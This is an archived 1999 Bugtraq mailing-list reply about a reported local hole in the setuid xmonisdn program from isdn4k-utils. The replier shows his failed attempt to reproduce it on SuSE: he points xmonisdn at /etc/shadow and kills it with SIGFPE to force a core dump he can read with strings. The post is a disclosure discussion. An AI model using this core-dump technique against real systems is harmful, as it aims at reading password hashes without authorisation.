OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: Re: xmonisdn (isdn4k-utils/Linux) bug report

Re: xmonisdn (isdn4k-utils/Linux) bug report

Jan-Hendrik Terstegge (sysadminTATOOINE.PING.DE)
Wed, 20 Oct 1999 13:40:00 +0000

On Tue, 19 Oct 1999 Ron wrote:
> While playing with xmonisdn (included in the isdn4k-utils package),
> I discovered a little bug. I didn't find anything regarding xmonisdn
> in the Bugtraq archives, so here's a quick post.
> I'm wondering if other xmonisdn users can reproduce this exploit.
> (Tested on my workstation, which is running Red Hat Linux 6.0)
>[... exploit ...]
I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it
seems as if it was an only RedHat Linux exploit.
This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my
xmonisdn dies only with an Floating exception but it doesn't dump a core.

---snip---
[pts/[pts/0tatooine] /usr/bin > pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x 1 root root 15340 Jul 23 01:20 xmonisdn
[pts/[pts/0tatooine] /usr/bin > xmonisdn -file /etc/shadow

[1] + Stopped xmonisdn -file /etc/shadow
[pts/[pts/0tatooine] /usr/bin > bg
[1] xmonisdn -file /etc/shadow &
[pts/[pts/0tatooine] /usr/bin > killall -8 xmonisdn
[1] Floating exception xmonisdn -file /etc/shadow
[pts/[pts/0tatooine] /usr/bin > strings core |less
strings: core: File or Directory not found
---snip--- 

--
Jan-Hendrik Terstegge
<sysadmintatooine.ping.de>

This archive was generated by hypermail 2.0b3 on Wed Oct 20 1999 - 13:19:20 CDT